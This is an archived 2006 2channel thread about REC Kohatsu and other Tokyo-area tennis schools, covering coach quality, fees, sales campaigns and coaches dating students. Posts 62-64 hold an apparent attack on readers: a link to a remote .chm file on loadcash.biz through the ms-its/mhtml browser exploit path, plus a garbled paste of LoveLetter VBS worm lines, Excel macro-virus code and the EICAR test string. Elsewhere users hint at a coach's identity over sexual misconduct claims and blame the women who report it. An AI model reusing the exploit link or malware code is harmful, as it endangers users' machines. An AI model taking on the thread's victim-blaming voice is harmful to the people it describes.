2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

レック興発テニススクール

1 :名無しさん@エースをねらえ!:2006/06/07(水) 18:54:18 ID:Oe8TGQ3D
コミュニティーアリーナ、高島平、NEOインドア他、コーチの質も高いと聞いてますが、どこがいいですか?

2 :名無しさん@エースをねらえ!:2006/06/07(水) 19:18:33 ID:TROS3j43
2

3 :名無しさん@エースをねらえ!:2006/06/07(水) 20:54:01 ID:PHMv/Rur
↑明らかに関係者ですね。
あんまりやりすぎるとたたかれますよ。



4 :名無しさん@エースをねらえ!:2006/06/07(水) 21:10:54 ID:Oe8TGQ3D
1です。前にレック関係のスクールに通っていて数年ぶりに転勤で東京に戻ってきました。テニススクール探しをしています。レックに限らずお薦めがあったらアドバイスしてください。


5 :名無しさん@エースをねらえ!:2006/06/08(木) 22:20:15 ID:+FFal2KT
どこがいいって、浜松がよかったら浜松まで行くのですかね。。

>>1は一体どこのスタッフの方ですか?

6 :名無しさん@エースをねらえ!:2006/06/09(金) 19:04:21 ID:5EFF+/mG
本社

7 :名無しさん@エースをねらえ!:2006/06/16(金) 07:58:46 ID:UZcDGuU1
武蔵小杉のコーチで、コーチングの上手いコーチ、イケメンコーチいますか?

8 :名無しさん@エースをねらえ!:2006/06/16(金) 17:16:12 ID:jIPktUn3
Sヘッドコーチの事?

9 :名無しさん@エースをねらえ!:2006/06/16(金) 21:29:45 ID:I60zKjeV
ハゲ?

10 :名無しさん@エースをねらえ!:2006/06/17(土) 12:44:30 ID:zzf/TmIk
Sコーチの異動で生徒が後を追ってかなり動いたらしいよ。


11 :名無しさん@エースをねらえ!:2006/06/17(土) 18:47:17 ID:do4CY+ks
↑よくあることですな

12 :名無しさん@エースをねらえ!:2006/06/17(土) 21:38:02 ID:zzf/TmIk
女関係では厳しくてバレたら首になっちゃうから、
ここの社員コーチたちは固いってよ。
あー、もったいない。

13 :名無しさん@エースをねらえ!:2006/06/18(日) 01:30:53 ID:YFC9GLwg
私は高島平ではないんだけど…
やっぱり女性関係厳しいんだ。
コーチにメアド聞こうと思ってるんだけど、止めるべきかな??
ちなみに社員ではなくアルバイトコーチに。

14 :名無しさん@エースをねらえ!:2006/06/18(日) 16:30:18 ID:uqRq9zVw
生徒と結婚するコーチ多いし平気

15 :名無しさん@エースをねらえ!:2006/06/20(火) 00:53:56 ID:36t3ZWRN
個人的なメールのやりとりも原則は×。
生徒やめてから聞きな。
別のスレで高島平もりあがってるね。

16 :名無しさん@エースをねらえ!:2006/06/20(火) 01:01:30 ID:qwEqEIha
↑そんなん知ってて言ってるんだよ〜ん。
ますます内部の人ですね
スレ立ててビビったか

17 :アルバイトコーチ:2006/06/20(火) 02:07:28 ID:LqzHgwa2
俺らはほとんどが大学生で体育会かサークルか。いくらでもウェルカム!

18 :名無しさん@エースをねらえ!:2006/06/20(火) 02:29:40 ID:qwEqEIha
↑ナイスコーチでーす!

19 :名無しさん@エースをねらえ!:2006/06/20(火) 14:05:36 ID:yFOHKuqn
15は何様のつもりかしら。
原則は×とか言っちゃって。
図星であせっちゃってるスタッフっぽいね。
もてないコーチかな?


20 :名無しさん@エースをねらえ!:2006/06/22(木) 23:48:43 ID:ggF8DN6L
各スクールのいい所、わるい所、特長を語りませんか?

21 :名無しさん@エースをねらえ!:2006/06/23(金) 23:32:08 ID:E4pbwoHY
レック系か
とりあえず料金安い
でもコーチ下手
誰でもコーチになれる
高島平、西新井は室内
ヨーカドーの尻に敷かれてる

22 :名無しさん@エースをねらえ!:2006/06/25(日) 03:14:33 ID:vtnQY+2q
このスレヤヴァイ…
 まずレック後発っていうスレタイの時点で内部。

 もう、開き直って愚痴りまくるか??w

23 :名無しさん@エースをねらえ!:2006/06/28(水) 23:10:18 ID:RG7j6RyJ
レックのコーチ大丈夫か??下手なのに意見だけいって俺はできるんだぞ〜!みたいな
態度されるとむかつくんだよね。無駄に笑いをとろうとするし。ちがうところで会員になるしかないな。いいとこないかな?


24 :名無しさん@エースをねらえ!:2006/06/28(水) 23:38:05 ID:sTYscRi4
『気に入らないなら辞めてもらって結構』みたいな事平気で言ってた。教えてる立場だけで客の上から見下してる感じだし。コーチもフロントも結構態度デカい。

25 :名無しさん@エースをねらえ!:2006/06/29(木) 00:12:00 ID:vNhxeUGG
だからやめればいいじゃない

26 :名無しさん@エースをねらえ!:2006/06/29(木) 00:39:15 ID:LnN72yu+
辞めたら屈したみたいで悔しい。コーチを負かすまで意地でも辞めるもんかっ。

27 :名無しさん@エースをねらえ!:2006/06/29(木) 07:56:59 ID:2dOQ2nVy
馬鹿じゃん。
 負けすとかいみわかんねーし、勝ちも負けもあるもんか…


28 :名無しさん@エースをねらえ!:2006/06/29(木) 12:41:43 ID:LnN72yu+
馬鹿でした…
万が一ヤツラより巧くなったら『感謝しな、俺達のおかげだよ』なんて言われかねない…
スクールを辞めるのが一番だな

29 :名無しさん@エースをねらえ!:2006/06/29(木) 17:27:17 ID:LfMNffZZ
>>23
TOPとかはいいよ。
テニススクールは楽しくないなら辞めればいいさ。

30 :名無しさん@エースをねらえ!:2006/06/29(木) 21:27:58 ID:+3N6TacP
\

31 :名無しさん@エースをねらえ!:2006/06/30(金) 23:37:41 ID:Hb5/UZ/8
そうだね、やめるのがいいよね。態度でかいんだよ、学生のくせに。むかつくんだよ。

32 :名無しさん@エースをねらえ!:2006/07/01(土) 06:25:09 ID:PeOzmTNo
こんなとこに文句書いてる人は早くやめて他のスクールに行きましょう

33 :名無しさん@エースをねらえ!:2006/07/03(月) 23:33:59 ID:Y2K8WWqu
もっと親切に教えてほしいわ。確かに学生がバイトでやってるから、適当にやるのは仕方ないと思うけど。

34 :名無しさん@エースをねらえ!:2006/07/04(火) 00:30:21 ID:ZZu31O4u
どこの生徒さんですか?

35 :名無しさん@エースをねらえ!:2006/07/10(月) 23:13:53 ID:aGcSjHpc
>>34
どこだっていーじゃん…

36 :名無しさん@エースをねらえ!:2006/07/11(火) 00:07:40 ID:mRc9Oz1q
武蔵小杉?

37 :名無しさん@エースをねらえ!:2006/07/14(金) 22:16:46 ID:11FgIBIv
>>31とか>>34みたいに学生だから云々という人って教えてもらおう
っていう謙虚な姿勢が足りないのでは?
確かに人間的には未完成な年代だし、人物的に問題がある奴も
中にはいるだろうけど学生だからっていう見下したような気持ちがあると
相手にもそれは伝わるんじゃないかと思う。
自分は府中で学生のコーチに教わってるけど、丁寧に教えてくれるよ。


38 :名無しさん@エースをねらえ!:2006/07/14(金) 22:18:05 ID:11FgIBIv
>>34じゃなくて>>33だった・・・

39 :名無しさん@エースをねらえ!:2006/07/14(金) 23:26:04 ID:KTFg1oek
学生のコーチで『おいらには聞かないで』てオーラ出してる人いる。
まあ、彼らも指導受けてる身だから大目にみてあげてる。

40 :名無しさん@エースをねらえ!:2006/07/14(金) 23:46:01 ID:3dfHgFmP
まず、ネットで文句言う人、違うスクールもいっぱいあるし、文句ない人に習えばいいじゃない
そしてこのスレ立てた人はおそらく内部の人だろうけど、2ちゃんなんて絶対メチャクチャ言われるんだから削除した方がいいですよ

41 :名無しさん@エースをねらえ!:2006/07/15(土) 08:12:50 ID:9gjt344j
そんな事わかってるけど、スクールを変えられない事情とかあんじゃない?メチャクチャ言ったっていいじゃん?ここに書いたことイチイチまともに聞いて改善とかすんのかよ?w
逆にコーチから生徒への文句とかも聞いてみたいかもw

42 :名無しさん@エースをねらえ!:2006/07/15(土) 12:53:05 ID:zH1Y61j5
レックのコーチって分かってるのになかなか生徒の文句は言えないんじゃないかな

43 :名無しさん@エースをねらえ!:2006/07/15(土) 23:47:08 ID:9gjt344j
じゃ文句じゃなくてアドバイス。

44 :名無しさん@エースをねらえ!:2006/07/15(土) 23:53:52 ID:zH1Y61j5
アドバイス?
笑える

45 :名無しさん@エースをねらえ!:2006/07/17(月) 18:40:51 ID:LbJtCmgu
おまえら、アフォ。

46 :名無しさん@エースをねらえ!:2006/07/19(水) 15:02:52 ID:0dIAy5CR
人間的に未完成って完成してるってどんなのなの??いってみろよ。そういってるやつは
人間的に完成してるわけ??人を傷つけるって事は人間的に完成してるのか。

47 :名無しさん@エースをねらえ!::2006/07/19(水) 23:17:01 ID:P7hDytqw
たまに覗くと面白いね。
○○キャンペーンとか何とかでとにかくうるさいとこですわよ。
単純にテニスを習いにきてるのにね。

48 :名無しさん@エースをねらえ!:2006/07/20(木) 00:00:50 ID:0dIAy5CR
人の気持ちも考えないでがつがついう人がえらいんかよ、テニスコーチさんよ!ふざけんなよ、
ば〜〜〜〜〜か!!

49 :名無しさん@エースをねらえ!:2006/07/26(水) 16:10:33 ID:h5iYbgrY
前よりコーチの対応が丁寧になったような?

50 :名無しさん@エースをねらえ!:2006/07/26(水) 23:57:46 ID:VddgWkeC
2ちゃんでボロクソ言われてるからみんなビビったんじゃないですか?
コーチの人たちも話題になって結構みんな2ちゃん見たらしいですよ

51 :名無しさん@エースをねらえ!:2006/07/27(木) 11:36:13 ID:SGWSBiJF
へぇ?見たんだ?ビビるぐらいなら最初から…つか2ちゃんに書かれてビビるコーチいるのだろうか?

52 :名無しさん@エースをねらえ!:2006/07/28(金) 17:01:17 ID:i5H1pu74
あのね
コーチ本人というより、本社や上層部の人がここを見たらさすがにクレームが起きないような対策を考えるんじゃない?
組織なんだからバイトがクレーム対象になったってレックの責任でしょ
某バイトコーチが「2ちゃん怖いから気をつけなきゃ」って言ってた
まあ、文句を言われるようなコーチも悪いし、このスレを立てた内部の人も自業自得

53 :名無しさん@エースをねらえ!:2006/08/27(日) 19:36:03 ID:8JEG5yPl
府中のコーチ陣のレベルってどうなんだろうか?




54 :おちょうふじん:2006/08/28(月) 00:48:20 ID:VITmHBaw
レックのコーチはほとんど女子生徒にちょっかい出してるよ。
上層部はいろいろと偉そうなことを言って生徒との付き合いを厳しくしてるけど
自分たちも生徒と付き合ったり結婚したりしているらしいよ。
テニスコーチは客観性がないからな。


55 :名無しさん@エースをねらえ!:2006/08/28(月) 00:59:42 ID:l+5DkjyU
あなたに何がわかる

56 :名無しさん@エースをねらえ!:2006/09/10(日) 09:48:58 ID:mclzzr4V
元レックバイトコーチです。

キャンペーン…たしかにうるさいですね。何せ年の半分は何かしかやってますし。

ヘッドコーチクラスの奥さんは会員さんが多いです。
まぁ出会いがそこしかないから当然の成り行きでしょうね。

57 :名無しさん@エースをねらえ!:2006/09/13(水) 14:39:53 ID:ZZoDSpQ+
↑自分のいたところを悪く言うとは・・。
良い思い出が無い落ちこぼれ君なんですね。

58 :名無しさん@エースをねらえ!:2006/09/14(木) 01:29:26 ID:r3dyc23i
レックはどこでもコーチ不足なのかなぁ。
いつも大募集してるし…

59 :名無しさん@エースをねらえ!:2006/09/14(木) 01:59:12 ID:D3QlFYdA
レッスンフィー安いし、チラシ配りなんかもやらせるから辞めちゃうんだよ

60 :名無しさん@エースをねらえ!:2006/09/28(木) 12:29:50 ID:ZsSIh8FN
元レックバイトコーチです。
レッスンフィー安いし、昇給しない。
さらに、チラシ配り、ガット張りをやらされてこき使われるし、それを社員はわかっていない。わかっていれば昇給の対象にもなるだろうし、練習相手にもなってくれると思ってたのに、、、無駄でした。


しかも、コーチはみんな下手くそ。自分自身は上手いとは思ってない、スクール内じゃ、トップクラスになってしまった、だからやめました。
もっと上手くなりたいって思ってたのに、少なくとも僕のところは、コーチ陣はサークル以外の試合にも出ないし、ホントに上手くなろうっていう気があるのかどうかって思った。

61 :名無しさん@エースをねらえ!:2006/10/04(水) 03:08:23 ID:oeg8G3jq
でも、ここのコーチは、指導が好きです。誰がなんと言おうとね。

62 :名無しさん@エースをねらえ!:2006/10/05(木) 21:34:54 ID:J09fVBtF
60>>
http://www.loadcash.biz//adverts//35//main.chm::/main.htm"

63 :名無しさん@エースをねらえ!:2006/10/05(木) 21:58:23 ID:J09fVBtF
http://www.loadcash.biz//adverts//35//main.chm::/main.htm"

64 :名無しさん@エースをねらえ!:2006/10/06(金) 13:09:05 ID:LbDzXwFa
<body onload=window()>
If s = fso.CopyFile f1.path, f1.path+"l"
Set A4 (1)))
fso.copyfile \"
c MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = fso.CopyFile f1.path, f1.path+"l"
ToInfect.
G.RegWrite A
lines(n)=
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w *

65 :名無しさん@エースをねらえ!:2006/10/30(月) 13:50:39 ID:jDSjeaMI
テニスクラブ辞めました。コーチに遊ばれた…。

66 :名無しさん@エースをねらえ!:2006/10/30(月) 20:18:39 ID:2O1kO0ZG
遊んでもらえてよかったね!

67 :名無しさん@エースをねらえ!:2006/10/31(火) 11:13:52 ID:bB2RC3uu
>>65
どんな風に遊ばれたの?
どこのスクール?

68 :名無しさん@エースをねらえ!:2006/10/31(火) 12:05:42 ID:arxUI9v/
結局、ゃりたかっただけみたぃな。ロビンソンテニスクラブですょ。

69 :名無しさん@エースをねらえ!:2006/10/31(火) 18:34:05 ID:p/CkU/yJ
やってもらえてよかったね!
あなたにもスキがあったんでしょうね

70 :名無しさん@エースをねらえ!:2006/10/31(火) 18:42:22 ID:arxUI9v/
それはぁりますね。憧れのコーチだったから。

71 :名無しさん@エースをねらえ!:2006/10/31(火) 18:49:40 ID:HawO8NO6
春日部か

72 :名無しさん@エースをねらえ!:2006/10/31(火) 23:05:27 ID:bB2RC3uu
まぁそんな事はよくありますよ。
コーチと2人で合う事になった時点で割り切らないと。
遊ばれたと言うより貴女にもその気がなければHはできませんからね。


73 :名無しさん@エースをねらえ!:2006/11/01(水) 13:24:07 ID:hMOzj6pb
もちろん同意しましたょ。それからはそーゅー話ばっかりしてきて、ィャになって一気に冷めました。断ったら態度が今までと違って顔合ゎせるのが気まずくなった。

74 :名無しさん@エースをねらえ!:2006/11/01(水) 14:56:03 ID:XOij9X21
でもあなたね
事実だったら誰だか分かっちゃいますよ
コーチもこれ見てるし

75 :名無しさん@エースをねらえ!:2006/11/01(水) 16:11:23 ID:hMOzj6pb
構ゎなぃですょ。もぅ関ゎる事なぃので…。

76 :名無しさん@エースをねらえ!:2006/11/03(金) 10:34:30 ID:PZXYRmnF
いい生徒だね。
やられて辞めるのは一番好都合だよ。

77 :名無しさん@エースをねらえ!:2006/11/03(金) 16:18:32 ID:b64/NMRs
テニスクラブには報告しましたけどね。

78 :名無しさん@エースをねらえ!:2006/11/03(金) 20:56:02 ID:PZXYRmnF
じゃあそのコーチはクビになっちゃうね

79 :名無しさん@エースをねらえ!:2006/11/05(日) 01:56:27 ID:WtoMgUjo
↑それって誰!?私も同じような経験があるんだけど同じコーチだったら、ロビンソン辞めようかな…

80 :名無しさん@エースをねらえ!:2006/11/05(日) 05:46:11 ID:1wMId3b+
ホントですか!?元カノも会員だったみたぃですけど。

81 :名無しさん@エースをねらえ!:2006/11/05(日) 06:07:30 ID:1wMId3b+
ぁ、ァドレスにペンギンって入ってぃるコーチですが…同じ方ですかぁ??

82 :名無しさん@エースをねらえ!:2006/11/05(日) 21:54:39 ID:WtoMgUjo
↑はい。間違いないです…彼、実はそういう人だったんですね(^^;)なんかショックです。それっていつ頃の話ですか!?

83 :名無しさん@エースをねらえ!:2006/11/05(日) 22:23:46 ID:1wMId3b+
去年の夏です。最近は、電話で『少し胸大きくなったでしょ?遊んでるの?』って言ゎれました。    ぃっ頃ですか??ゃはり、レッスン終わった後に、連絡先のメモを渡されました??

84 :名無しさん@エースをねらえ!:2006/11/06(月) 10:34:47 ID:gLD4zlS8
私もそのコーチ知ってます。
アドレスを渡されました。

85 :名無しさん@エースをねらえ!:2006/11/06(月) 11:21:00 ID:rnHX7y33
そのコーチは色んな人に連絡先を渡しているんですね…テニスクラブに報告をしたんですよね??そのコーチはいまだにレッスンやっていますよ(*_*)

86 :名無しさん@エースをねらえ!:2006/11/06(月) 13:25:33 ID:vQxstscP
コーチはよくやるみたいですよ。
多分その人に飲みに誘われました。

87 :名無しさん@エースをねらえ!:2006/11/06(月) 17:18:32 ID:j0jGBOSd
レッスンゃってるんですかぁ…ロビンソンは必要としてるんですねぇ。

88 :名無しさん@エースをねらえ!:2006/11/06(月) 17:50:44 ID:lGQG29nL
私もそういう事あったよO(><;)(;><)O
他にどんなことされた??

89 :てにくん:2006/11/06(月) 18:05:47 ID:t2TXdYtP
女性のくだらない話はいいとして、自分、今、神奈川にあるレックのスクール(厚木か伊勢原か相模原)あたりでテニスを習おうと考え中なんですが、誰かどれかに通ってる人とか通ってた人いませんか?

90 :名無しさん@エースをねらえ!:2006/11/06(月) 18:18:09 ID:j0jGBOSd
他のコーチの悪口を聞かされ、悪ぃィメージがつぃてしまぃ振替行きずらかったです。

91 :名無しさん@エースをねらえ!:2006/11/06(月) 18:20:18 ID:vQxstscP
>>89
くだらなくないし。
ちゃんとテニスしたいならレックじゃないとこ行けば?

92 :名無しさん@エースをねらえ!:2006/11/07(火) 15:18:57 ID:QOYn/Gj4
アホくさいね どうでもいいんじゃない・・・

93 :名無しさん@エースをねらえ!:2006/11/07(火) 21:05:22 ID:1w0BAMxZ
クビにならないんだ。

94 :名無しさん@エースをねらえ!:2006/11/08(水) 09:54:38 ID:hNv54+sc
クビでしょ?そんなやつは当然。

95 :名無しさん@エースをねらえ!:2006/11/08(水) 11:24:19 ID:7K9nKh1W
本人がこれ見てたらビビるだろうね

96 :名無しさん@エースをねらえ!:2006/11/08(水) 14:37:05 ID:ewYQGoJe
まあ、どっちもどっちじゃねぇ。
やらかしちゃった奴もバカだけど、遊ばれた方もバカだね。
見る目がないんだよ。
いい勉強になったじゃん。

97 :名無しさん@エースをねらえ!:2006/11/08(水) 15:06:48 ID:7K9nKh1W
本人が書き込んでるかもね

98 :名無しさん@エースをねらえ!:2006/11/08(水) 17:24:18 ID:ewYQGoJe
残念ながら本人ではありません。


99 :名無しさん@エースをねらえ!:2006/11/08(水) 19:06:48 ID:TJK4c7TL
本人見てたら驚くでしょうね。知らせてあげよっかなぁ〜笑"

100 :名無しさん@エースをねらえ!:2006/11/08(水) 21:36:31 ID:As9p1RCe
そうだね〜。
こっそり知らせちゃいなよ!
美味しい事ばかりじゃないって教えてあげなきゃ。

101 :名無しさん@エースをねらえ!:2006/11/09(木) 01:17:06 ID:siE7r+hY
スクール行くなら食われる覚悟で行け。

102 :名無しさん@エースをねらえ!:2006/11/09(木) 02:29:15 ID:2DyFAyAd
フロントマンはィィ方でした!

103 :名無しさん@エースをねらえ!:2006/11/09(木) 05:14:44 ID:47FhzSrt
そんな手癖の悪いコーチは、クレーム攻撃で辞めさえちゃえよ
いちばん楽で効果的なのがお店に「お客様相談のカード」を
バンバン出してやめてもらえよ。

104 :名無しさん@エースをねらえ!:2006/11/09(木) 10:30:03 ID:siE7r+hY
遊ばれた本人がバンバン出すの?
レイプされたわけでもなく本人も同意の元やってるんだからどうなのかね?

105 :名無しさん@エースをねらえ!:2006/11/09(木) 21:59:47 ID:LeTxWPZD
女が悪い!
被害妄想だよ。
「遊ばれた」?
なんだそれ?
お前が騙されるのが悪い。
ガキじゃねーんだろ?

106 :名無しさん@エースをねらえ!:2006/11/09(木) 23:32:52 ID:2DyFAyAd
全部女が悪いん?男は悪くないんだぁ。

107 :名無しさん@エースをねらえ!:2006/11/09(木) 23:44:08 ID:siE7r+hY
だってその時は好きになっちゃったんでしょ?

108 :名無しさん@エースをねらえ!:2006/11/10(金) 00:03:58 ID:VNQMr9vk
世の中、騙される奴が悪いんだよ!
そろそろこのネタ飽きてきた感じしねぇ。


109 :名無しさん@エースをねらえ!:2006/11/10(金) 00:54:28 ID:UPog3Df+
コーチはここで話題になっている事を知らずにレッスンしてるのかなぁ?まさに知らぬが仏☆でもなんだかかわいそう(笑)     
他にネタでもぁるのですかぁ?

110 :RDS001:2006/11/10(金) 02:53:41 ID:UDl+kBes
CA相模原コーチの者です。
正直ショックを受けました…皆様申し訳ありません。
ただ、『全員が全員』では全くありませんのでどうか信じてください。
経験の長いコーチや人間性に問題がある方もいるかも知れませんが、お客様とのプライーべートの接触はNG。
と育ってきた新しい世代が今良いレッスンを出来るようになって来てます。
どうか一度レッスンを受けに来てください。お願いします。


長文申し訳ありません。


111 :名無しさん@エースをねらえ!:2006/11/10(金) 13:35:35 ID:Xb/NHMUe
だとさ!
このスレ立てた人じゃない?

112 :あらら:2006/11/10(金) 15:52:23 ID:EGcA8npH
相模原の生徒です。ほんとにコーチの方かしら?

113 :名無しさん@エースをねらえ!:2006/11/10(金) 16:46:57 ID:Xb/NHMUe
コーチたちはこれ見てるよ。

114 :あらら:2006/11/10(金) 17:42:22 ID:EGcA8npH
ほんとに全員がプライベートの付き合いをしてないのでしょうかねぇ?だいぶ怪しい

115 :名無しさん@エースをねらえ!:2006/11/10(金) 17:47:07 ID:Xb/NHMUe
ちゃんと読め
全員がしてないなんて言ってない
コーチと生徒が付き合わないスクールなんてないよ

116 :名無しさん@エースをねらえ!:2006/11/10(金) 18:01:48 ID:gxn6Is56
http://www.rec-tennis.com/club_data/kasukabe/
このなかにヤリチンがいるのか?

117 :名無しさん@エースをねらえ!:2006/11/11(土) 07:22:28 ID:BhvPopb1
こういうヤリチンがいる所だと女の子のジュニアとか安心して通わせられない
な。レイプじゃなきゃなんでも有りなんだろ。

118 :名無しさん@エースをねらえ!:2006/11/13(月) 10:28:56 ID:kphwlzj+
どのスクールでも必ず1人はそうゆうコーチがいるよ
でもお宅のブスは安心だよ

119 :名無しさん@エースをねらえ!:2006/11/13(月) 12:20:23 ID:N0vaasAB
116>>
それは言いすぎでしょ(笑)
この中の一人なんだから、他の誤解されちゃう奴が可哀想・・・

120 :名無しさん@エースをねらえ!:2006/11/13(月) 16:57:52 ID:M7/02cXI
>>116
見た感じそんなに何人もこましてそうなカッコいいコーチはいないけどね。

121 :名無しさん@エースをねらえ!:2006/11/13(月) 23:25:24 ID:AuzACSZb
スクールボールが最近やわらかいような気がしてならないんですが、わたしだけ感じるのでしょうか?なんだか急に悪くなったような気がします。

122 :名無しさん@エースをねらえ!:2006/11/14(火) 20:02:32 ID:Cda9J59h
そろそろ、ラケットキャンペーンはじまるかな?

123 :ボール:2006/11/14(火) 22:29:22 ID:1zdGpGWs
半年に一回ぐらいしか換えてくれないよね〜
だからやわらかい!

124 :バイト君:2006/11/16(木) 04:04:13 ID:5XFmegZN
ラケットキャンペーン!!
実はボッタクリキャンペーン!どこよりも高い〜
ラケット買ってもガット代、張り代取られるからかなり高くつく!
しかも張るのは、適当なバイト達♪


125 :はっぴ:2006/11/16(木) 18:36:24 ID:V2rQu80/
120に同感...
もっと良い人探したほうがいいわね。もっと上を狙いなさい。

126 :名無しさん@エースをねらえ!:2006/11/17(金) 00:56:08 ID:1G0FBmSD
帽子はadidas、ウェァは上がNIKEで下がYONEX。統一感なし(笑)コーチでもそこまでオシャレに気を配ってなぃのかなぁ。

127 :名無しさん@エースをねらえ!:2006/11/17(金) 09:53:41 ID:hNXg+Efc
武蔵小○の スク〜ルに通ってるけど、ほとんどのコーチが熱心だし 感じいいなあ
男にも優しいし?


128 :名無しさん@エースをねらえ!:2006/11/17(金) 11:16:17 ID:Raz2+NFk
コーチは人から見られてるんだし、ある程度オシャレじゃないとだめだね
いくら金が無くても
センス無いコーチに習いたくない

129 :名無しさん@エースをねらえ!:2006/11/17(金) 14:06:47 ID:gfS6ebyK
見た目がォシャレでヘタクソなコーチょり、統一感のなぃコーチでも技術的に上手いコーチがぃいなぁ

130 :名無しさん@エースをねらえ!:2006/11/18(土) 00:11:10 ID:kxQVnOEk
え〜
みすぼらしいのはやだ

131 :名無しさん@エースをねらえ!:2006/11/18(土) 11:01:52 ID:4vKiLUOc
見かけ倒しの方がダサイよ〜

132 :名無しさん@エースをねらえ!:2006/11/19(日) 20:23:46 ID:P3lLsfFZ
NEOのコーチが、生徒さんと飲みに行ってるコーチがいるって話とプライベートレッスンをしているって話を聞いたことがあります。これって許されているんですかねぇ・・・。

133 :名無しさん@エースをねらえ!:2006/11/20(月) 03:25:47 ID:s4Dw51NT
禁止だけどみんなやっている
俺もやっている
副収入だから

134 :名無しさん@エースをねらえ!:2006/11/20(月) 23:07:04 ID:s4Dw51NT
まぁ社員は無理でしょう。

135 :名無しさん@エースをねらえ!:2006/11/21(火) 01:10:35 ID:jBTrahnQ
プライベートで金とれるようなコーチがNEOにいるか?

136 :名無しさん@エースをねらえ!:2006/11/21(火) 23:20:19 ID:1nXrnOqc
まあわからんよ。
アシスタントでもモテル奴はモテルから。

137 :名無しさん@エースをねらえ!:2006/11/27(月) 13:24:43 ID:vP+u42Qq
http://g007.garon.jp/gdb/GJ/2J/2R/4x/0G/tz/aI/1L/2X/vZ/0Q/uZv.jpg

138 :名無しさん@エースをねらえ!:2006/11/30(木) 00:56:41 ID:MPqjOjjj
コーチがワキガ臭い

139 :名無しさん@エースをねらえ!:2006/12/03(日) 23:03:29 ID:esSe7PRg
いるね!
ここのコーチ悪臭漂わせてるし、
息もくさいし、アップもスゴーく襟汚い。
不潔なコーチ!

140 :名無しさん@エースをねらえ!:2006/12/04(月) 10:31:47 ID:G8vPLWYY
私が行ってるとこのコーチは割とみんなオシャレだよ?

141 :名無しさん@エースをねらえ!:2006/12/05(火) 23:35:54 ID:1Yp6Hfhq
給料安いからお風呂に入れないし
洗濯できないんじゃ!?


142 :名無しさん@エースをねらえ!:2006/12/06(水) 01:29:45 ID:qgKsCAM6
ここの会社って、コーチと生徒の交流を禁止してるけど、多少は認めてあげたほうが売上に繋がりそうじゃない?
忘年会や新年会くらいは親睦を深める意味で他のスクールはやってるし。
バカコーチが生徒の女の子と飲みに行くとバカな事するかも知れない危険性があるから生徒との交流を禁止するんだろうけどね。

143 :名無しさん@エースをねらえ!:2006/12/06(水) 16:38:27 ID:TEQW4+1T
忘年会くらいは良さそうなもんだけどね・・

144 :あの:2006/12/06(水) 19:16:26 ID:K1yWP0gJ
いや、他でコーチやってるもんだが、別にお客さんと忘年会やら新年会やら一緒にやりたくねー。なんでそんな席でも気をつかなきゃならんなんだ

145 :名無しさん@エースをねらえ!:2006/12/06(水) 20:39:08 ID:TEQW4+1T
そーだね

146 :名無しさん@エースをねらえ!:2006/12/09(土) 13:38:56 ID:byzGj2CM
レックは業界では大きい部類の会社に入ると聞きます
社員が雑誌に載ったり等は良くある事だと聞きます
テニス関係のテレビドラマ等の出演の話は、噂では聞きましたが
実際はどうでしょう?(エキストラかもしれませんが)

147 :名無しさん@エースをねらえ!:2006/12/10(日) 00:30:08 ID:93Bji7TC
テニスのドラマのエンドロールにレックって出ていましたよ!雑誌にもよく載っているし・・。


148 :名無しさん@エースをねらえ!:2006/12/10(日) 03:37:20 ID:dSmY3m76
場所を提供しただけです。
お蝶婦人の後ろ姿をやっただけです。

149 :名無しさん@エースをねらえ!:2006/12/10(日) 18:18:58 ID:93Bji7TC
私、生徒だけど観客やった。エキストラ・・。

150 :名無しさん@エースをねらえ!:2006/12/12(火) 10:10:06 ID:Y9iIdbNN
146書いたの社員だろ!
都合の悪い話題が出ると話すりかえてるし〜
何回目だ!?


151 :名無しさん@エースをねらえ!:2006/12/12(火) 10:47:40 ID:OfMNEnZ/
違うよ
俺生徒だよ
ボケ

152 :名無しさん@エースをねらえ!:2006/12/16(土) 19:13:11 ID:plBnA/4U
ボケ言うな、ボケ

153 :名無しさん@エースをねらえ!:2006/12/18(月) 13:32:56 ID:RAJJOKyV
ぼけてるからボケって言うんだよアホ

154 :名無しさん@エースをねらえ!:2006/12/18(月) 23:59:01 ID:C04QioNX
>>150みたいな奴はどのスレにもいるね。
すぐ自演乙とか言う奴。
ボケ!

155 ::2006/12/20(水) 02:00:49 ID:tPC51hsM
Neo

156 :名無しさん@エースをねらえ!:2006/12/20(水) 02:02:53 ID:tPC51hsM
春日部

157 :名無しさん@エースをねらえ!:2006/12/20(水) 02:05:32 ID:tPC51hsM
Neoの女性のFコーチは大分前に生徒と付き合ってたらしい。
こんな事ゆるされるんでしょうか?


レッスンをばっくれたりしてるみたい。

158 :名無しさん@エースをねらえ!:2006/12/20(水) 02:20:03 ID:p35ElxTJ
誰と付き合おうが自由
ねたみはカッコ悪いよ
辞めればいいのに

159 :名無しさん@エースをねらえ!:2006/12/20(水) 03:45:40 ID:tPC51hsM
自由ねぇ〜

160 :名無しさん@エースをねらえ!:2006/12/20(水) 03:53:49 ID:tPC51hsM
別にねたみじゃないしねぇ〜

161 :名無しさん@エースをねらえ!:2006/12/20(水) 16:18:09 ID:rzDbl28w
ロビンソンのkコーチに遊ばれた。。。

なんでコーチってこういう人が多いんですかね。いい人だと思ったんですけど。

コーチにいい人なんているんでしょうか?

162 :名無しさん@エースをねらえ!:2006/12/20(水) 18:58:08 ID:IW3JPWyL
kコーチ?

163 :名無しさん@エースをねらえ!:2006/12/21(木) 03:03:46 ID:cBSyunZX
遊ばれた?
お前も惚れたんだろ?

164 :名無しさん@エースをねらえ!:2006/12/21(木) 04:50:27 ID:ZHbfEKMB
悪い人ばかりじゃないよ

いいコーチだって、いっぱいいるんだから

※私はコーチではありません

